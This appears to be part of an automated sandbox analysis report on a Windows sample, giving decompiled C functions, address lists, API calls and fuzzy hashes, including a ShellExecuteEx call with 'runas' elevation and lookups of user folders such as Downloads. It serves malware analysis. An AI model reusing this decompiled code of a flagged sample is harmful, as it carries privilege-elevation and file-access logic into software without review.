                                                    0x00459f8e
                                                    0x00459f99
                                                    0x00459f9f
                                                    0x00000000
                                                    0x00459fa4
                                                    0x00459a40
                                                    0x00459a43
                                                    0x00459bc8
                                                    0x00459bce
                                                    0x00459bd1
                                                    0x00459bd5
                                                    0x00459bdb
                                                    0x00459be1
                                                    0x00459be4
                                                    0x00459be8
                                                    0x00459c0f
                                                    0x00459c24
                                                    0x00459bea
                                                    0x00459bed
                                                    0x00459c02
                                                    0x00459c02
                                                    0x00000000
                                                    0x00459a49
                                                    0x00000000
                                                    0x00459a49
                                                    0x00459a43
                                                    0x004599c2
                                                    0x00459cc8
                                                    0x00459ccb
                                                    0x00459ccf
                                                    0x00459cd8
                                                    0x00459cd8
                                                    0x00000000
                                                    0x00459ccf
                                                    0x004599c8
                                                    0x004599cb
                                                    0x00000000
                                                    0x00000000
                                                    0x004599d1
                                                    0x00000000
                                                    0x00459fd6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00459ba6
                                                    0x00459ba8
                                                    0x00459baa
                                                    0x00459bb2
                                                    0x00459bb5
                                                    0x00459bb6
                                                    0x00459bbc
                                                    0x00000000
                                                    0x00000000
                                                    0x00459c2e
                                                    0x00459c31
                                                    0x00459c35
                                                    0x00459c69
                                                    0x00459c6f
                                                    0x00459c72
                                                    0x00459c79
                                                    0x00459c7b
                                                    0x00459c7e
                                                    0x00459c81
                                                    0x00459c86
                                                    0x00459c89
                                                    0x00459c89
                                                    0x00459c92
                                                    0x00459c37
                                                    0x00459c3a
                                                    0x00459c3f
                                                    0x00459c42
                                                    0x00459c48
                                                    0x00459c4a
                                                    0x00459c51
                                                    0x00459c54
                                                    0x00459c54
                                                    0x00459c56
                                                    0x00459c56
                                                    0x00459c5d
                                                    0x00459c62
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b56
                                                    0x00459b59
                                                    0x00459b5c
                                                    0x00459b5d
                                                    0x00459b62
                                                    0x00459b64
                                                    0x00459b73
                                                    0x00459b66
                                                    0x00459b67
                                                    0x00459b6c
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b3e
                                                    0x00459b41
                                                    0x00459b44
                                                    0x00459b46
                                                    0x00459b4c
                                                    0x00459b4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b7e
                                                    0x00459b81
                                                    0x00459b88
                                                    0x00000000
                                                    0x00000000
                                                    0x0045996a
                                                    0x0045996a
                                                    0x0045996b
                                                    0x00000000
                                                    0x0045996d
                                                    0x00459989
                                                    0x00000000
                                                    0x0045998b
                                                    0x0045998b
                                                    0x0045998d
                                                    0x00459990
                                                    0x00459990
                                                    0x0045a003
                                                    0x0045a009
                                                    0x00459998
                                                    0x00459998
                                                    0x00459999
                                                    0x00459999
                                                    0x0045999a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0045999a

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegisterAutomation$vcltest3.dll
                                                    • API String ID: 0-2963190186
                                                    • Opcode ID: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                    • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                    • Opcode Fuzzy Hash: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                    • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004730FC Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 54%
                                                    			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				char _v273;
				char _v280;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				signed int _t29;
				int _t59;
				int _t63;
				intOrPtr* _t81;
				signed int _t84;
				int _t91;
				intOrPtr _t93;
				intOrPtr _t100;
				intOrPtr* _t108;
				void* _t110;
				void* _t111;
				intOrPtr _t112;

				_t91 = __edx;
				_t29 = __eax;
				_t110 = _t111;
				_t112 = _t111 + 0xfffffed0;
				_v308 = 0;
				_v304 = 0;
				_v300 = 0;
				_v280 = 0;
				_t81 = __edx;
				_push(_t110);
				_push(0x473306);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t112;
				_t84 = __eax;
				if(__eax > 6) {
					L8:
					if(_t29 != 7) {
						SHGetSpecialFolderLocation(0, _t91,  &_v8); // executed
						SHGetPathFromIDList(_v8,  &_v273);
						E0040A174( &_v273, _t81);
					} else {
						_push(_t110);
						_push(0x4732a8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t112;
						E00472EF0( &_v280, _t81, _t84, 0);
						E00404DCC(_v280, 0x47331c);
						if(0 == 0) {
							SHGetSpecialFolderLocation(0, 5,  &_v8);
							SHGetPathFromIDList(_v8,  &_v273);
							E0040A174( &_v273,  &_v300);
							L00409D30(_v300, _t81);
							E00404CCC( &_v304, "\\Downloads",  *_t81);
							_t59 = E00409A58(_v304);
							__eflags = _t59;
							if(_t59 == 0) {
								E00404CCC( &_v308, 0x473390,  *_t81);
								_t63 = E00409A58(_v308);
								__eflags = _t63;
								if(_t63 == 0) {
									E004049C0(_t81);
								} else {
									E00404C88(_t81, 0x473390);
								}
							} else {
								E00404C88(_t81, "\\Downloads");
							}
						} else {
							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
							 *_t108( &_v296, 0, 0,  &_v12);
							E00404BE8(_t81, _v12);
						}
						_pop(_t100);
						 *[fs:eax] = _t100;
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x47330d);
					E004049E4( &_v308, 3);
					return E004049C0( &_v280);
				}
				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
					case 0:
						goto L8;
					case 1:
						_t91 = 0x1a;
						goto L8;
					case 2:
						__edx = 0x1c;
						goto L8;
					case 3:
						__edx = 0x23;
						goto L8;
					case 4:
						__edx = 0x2e;
						goto L8;
					case 5:
						__edx = 5;
						goto L8;
					case 6:
						__edx = 0;
						__eflags = 0;
						goto L8;
				}
			}























                                                    0x004730fc
                                                    0x004730fc
                                                    0x004730fd
                                                    0x004730ff
                                                    0x0047310a
                                                    0x00473110
                                                    0x00473116
                                                    0x0047311c
                                                    0x00473122
                                                    0x00473126
                                                    0x00473127
                                                    0x0047312c
                                                    0x0047312f
                                                    0x00473132
                                                    0x00473137
                                                    0x00473181
                                                    0x00473184
                                                    0x004732bb
                                                    0x004732cb
                                                    0x004732d8
                                                    0x0047318a
                                                    0x0047318c
                                                    0x0047318d
                                                    0x00473192
                                                    0x00473195
                                                    0x0047319e
                                                    0x004731ae
                                                    0x004731b3
                                                    0x00473206
                                                    0x00473216
                                                    0x00473227
                                                    0x00473234
                                                    0x00473246
                                                    0x00473251
                                                    0x00473256
                                                    0x00473258
                                                    0x00473275
                                                    0x00473280
                                                    0x00473285
                                                    0x00473287
                                                    0x00473299
                                                    0x00473289
                                                    0x00473290
                                                    0x00473290
                                                    0x0047325a
                                                    0x00473261
                                                    0x00473261
                                                    0x004731b5
                                                    0x004731cc
                                                    0x004731e1
                                                    0x004731ed
                                                    0x004731f4
                                                    0x004731f4
                                                    0x004732a0
                                                    0x004732a3
                                                    0x004732a3
                                                    0x004732df
                                                    0x004732e2
                                                    0x004732e5
                                                    0x004732f5
                                                    0x00473305
                                                    0x00473305
                                                    0x00473139
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0047315c
                                                    0x00000000
                                                    0x00000000
                                                    0x00473163
                                                    0x00000000
                                                    0x00000000
                                                    0x0047316a
                                                    0x00000000
                                                    0x00000000
                                                    0x00473171
                                                    0x00000000
                                                    0x00000000
                                                    0x00473178
                                                    0x00000000
                                                    0x00000000
                                                    0x0047317f
                                                    0x0047317f
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306), ref: 004731BA
                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00473206
                                                    • SHGetPathFromIDList.SHELL32(?,?), ref: 00473216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                    • String ID: SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                    • API String ID: 2341558874-1676591009
                                                    • Opcode ID: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                    • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                    • Opcode Fuzzy Hash: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                    • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004062DC Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 346 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 347 406313-406317 346->347 348 4063f6-4063fd 346->348 349 406323-406339 lstrlen 347->349 350 406319-40631d 347->350 351 40633c-40633f 349->351 350->348 350->349 352 406341-406349 351->352 353 40634b-406353 351->353 352->353 354 40633b 352->354 353->348 355 406359-40635e 353->355 354->351 356 406360-406386 lstrcpyn LoadLibraryExA 355->356 357 406388-40638a 355->357 356->357 357->348 358 40638c-406390 357->358 358->348 359 406392-4063c2 lstrcpyn LoadLibraryExA 358->359 359->348 360 4063c4-4063f4 lstrcpyn LoadLibraryExA 359->360 360->348
                                                    C-Code - Quality: 61%
                                                    			E004062DC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L0040131C();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401324();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L0040131C();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L0040131C();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L0040131C();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                    0x004062dc
                                                    0x004062e4
                                                    0x004062eb
                                                    0x004062ec
                                                    0x004062ff
                                                    0x00406304
                                                    0x0040630d
                                                    0x004063f6
                                                    0x004063fd
                                                    0x00406323
                                                    0x00406323
                                                    0x00406329
                                                    0x0040632a
                                                    0x00406337
                                                    0x0040633c
                                                    0x0040633f
                                                    0x0040633b
                                                    0x00000000
                                                    0x0040633b
                                                    0x0040634b
                                                    0x00406353
                                                    0x00406359
                                                    0x0040635e
                                                    0x0040636b
                                                    0x0040636f
                                                    0x00406370
                                                    0x00406371
                                                    0x00406386
                                                    0x00406386
                                                    0x0040638a
                                                    0x004063a3
                                                    0x004063a7
                                                    0x004063a8
                                                    0x004063a9
                                                    0x004063b9
                                                    0x004063be
                                                    0x004063c2
                                                    0x004063c4
                                                    0x004063d9
                                                    0x004063dd
                                                    0x004063de
                                                    0x004063df
                                                    0x004063ef
                                                    0x004063f4
                                                    0x004063f4
                                                    0x004063c2
                                                    0x0040638a
                                                    0x00000000
                                                    0x00406353

                                                    APIs
                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                    • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                    • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                    • API String ID: 1599918012-2375825460
                                                    • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                    • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                    • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                    • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00473490 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67sleepsynchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00473490(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __eflags, char _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char* _t33;
				intOrPtr _t43;
				intOrPtr _t52;
				void* _t56;

				_v12 = __ecx;
				_v8 = __edx;
				_t43 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t56);
				_push(0x473564);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffbc;
				E004032B4( &_v72, 0x3c);
				_v72 = 0x3c;
				_v64 = _t43;
				_v68 = 0x440;
				_v56 = E00404E80(_v8);
				if(_a8 != 0) {
					_v60 = 0x473574;
				}
				if(_v12 != 0) {
					_v52 = E00404E80(_v12);
				}
				_v44 = 1;
				_t33 =  &_v72;
				_push(_t33); // executed
				L0042EC28(); // executed
				if(_t33 != 0) {
					if(_a4 != 0 && _v16 != 0) {
						while(WaitForSingleObject(_v16, 0x32) == 0x102) {
							Sleep(0x32);
						}
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x47356b);
				return E004049E4( &_v12, 2);
			}

















                                                    0x00473497
                                                    0x0047349a
                                                    0x0047349d
                                                    0x004734a2
                                                    0x004734aa
                                                    0x004734b1
                                                    0x004734b2
                                                    0x004734b7
                                                    0x004734ba
                                                    0x004734c7
                                                    0x004734cc
                                                    0x004734d3
                                                    0x004734d6
                                                    0x004734e5
                                                    0x004734ec
                                                    0x004734f3
                                                    0x004734f3
                                                    0x004734fa
                                                    0x00473504
                                                    0x00473504
                                                    0x00473507
                                                    0x0047350e
                                                    0x00473511
                                                    0x00473512
                                                    0x00473519
                                                    0x0047351f
                                                    0x00473530
                                                    0x0047352b
                                                    0x0047352b
                                                    0x00473530
                                                    0x00473542
                                                    0x0047354b
                                                    0x0047354e
                                                    0x00473551
                                                    0x00473563

                                                    APIs
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                    • Sleep.KERNEL32(00000032,00000000,00000032,00000000,00473564), ref: 0047352B
                                                    • WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564), ref: 00473536
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteObjectShellSingleSleepWait
                                                    • String ID: <$runas
                                                    • API String ID: 3175876650-1187129395
                                                    • Opcode ID: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                    • Instruction ID: 5aa402594196cc22e358d2c9fc2044dae5621586ffdb0388778a4eaf1ff726ef
                                                    • Opcode Fuzzy Hash: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                    • Instruction Fuzzy Hash: BC217FB0904208BBDB15DFAAD486BDEBBB8EB04304F50807BF508A6291D77C9B45DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004099E0 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004099E0(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                                                    0x004099fb
                                                    0x00409a03
                                                    0x00409a39
                                                    0x00409a39
                                                    0x00409a05
                                                    0x00409a06
                                                    0x00409a12
                                                    0x00000000
                                                    0x00409a14
                                                    0x00409a1f
                                                    0x00409a37
                                                    0x00000000
                                                    0x00000000
                                                    0x00409a37
                                                    0x00409a12
                                                    0x00409a47

                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 004099FB
                                                    • FindClose.KERNEL32(00000000,00000000,?), ref: 00409A06
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409A1F
                                                    • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileTime$Find$CloseDateFirstLocal
                                                    • String ID:
                                                    • API String ID: 2659516521-0
                                                    • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                    • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                    • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                    • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043F118 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E0043F118(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				void* __edi;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t68;
				void* _t69;

				_t68 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t69 = _t17 - 0x84;
				if(_t69 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0043B6EC(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						_t23 = E0043C1FC(_t50, _t68); // executed
						return _t23;
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043F084(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = L00441A08(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t68 + 8)));
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_t32 = E00441704(_t50);
						_push(_t32);
						L00407540();
						return _t32;
					}
					goto L27;
				}
				if(_t69 == 0) {
					_t21 = E0043C1FC(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					L00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0043AAC0(_t50,  &_v28,  &_v20);
					_t21 = E0043EFF0(_t50, 0,  &_v28, _t65, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t68 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t66 = L004519E0(__eax);
					if(_t66 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t66 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E00441704(__eax);
						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
							_t47 =  *0x49bce0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x49bce0; // 0x0
								E0043C130(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}





















                                                    0x0043f11e
                                                    0x0043f120
                                                    0x0043f122
                                                    0x0043f124
                                                    0x0043f129
                                                    0x0043f148
                                                    0x0043f14b
                                                    0x0043f228
                                                    0x0043f22f
                                                    0x0043f27a
                                                    0x0043f27a
                                                    0x0043f27a
                                                    0x0043f26b
                                                    0x0043f26f
                                                    0x00000000
                                                    0x0043f26f
                                                    0x0043f159
                                                    0x0043f1f2
                                                    0x0043f1f9
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1ff
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f203
                                                    0x0043f20a
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f20f
                                                    0x0043f213
                                                    0x0043f216
                                                    0x0043f219
                                                    0x0043f21e
                                                    0x0043f21f
                                                    0x00000000
                                                    0x0043f21f
                                                    0x00000000
                                                    0x0043f15f
                                                    0x0043f12b
                                                    0x0043f1a1
                                                    0x0043f1aa
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1b9
                                                    0x0043f1c8
                                                    0x0043f1d5
                                                    0x0043f1dc
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1e2
                                                    0x00000000
                                                    0x0043f1e2
                                                    0x0043f12d
                                                    0x0043f130
                                                    0x0043f16b
                                                    0x0043f16f
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f17b
                                                    0x0043f183
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f189
                                                    0x0043f132
                                                    0x0043f133
                                                    0x0043f192
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f135
                                                    0x0043f138
                                                    0x0043f235
                                                    0x0043f243
                                                    0x0043f24e
                                                    0x0043f256
                                                    0x0043f261
                                                    0x0043f266
                                                    0x0043f266
                                                    0x0043f256
                                                    0x0043f243
                                                    0x0043f138

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Capture
                                                    • String ID:
                                                    • API String ID: 1145282425-3916222277
                                                    • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                    • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                    • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                    • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446564 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00446564(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4465ea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x49eb20 =  *0x49eb20 - 1;
				if( *0x49eb20 < 0) {
					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x49eb1c;
					E00446330(_t16, __edi,  *0x49eb1c);
					_t6 =  *0x436dd0; // 0x436e1c
					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
					_t8 =  *0x436dd0; // 0x436e1c
					E0041A548(_t8, _t16, _t17, _t31);
					_t21 =  *0x436dd0; // 0x436e1c
					_t10 =  *0x447948; // 0x447994
					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x436dd0; // 0x436e1c
					_t12 =  *0x4465f4; // 0x446640
					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x436dd0; // 0x436e1c
					_t14 =  *0x44675c; // 0x4467a8
					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4465f1);
				return 0;
			}















                                                    0x00446564
                                                    0x00446564
                                                    0x00446569
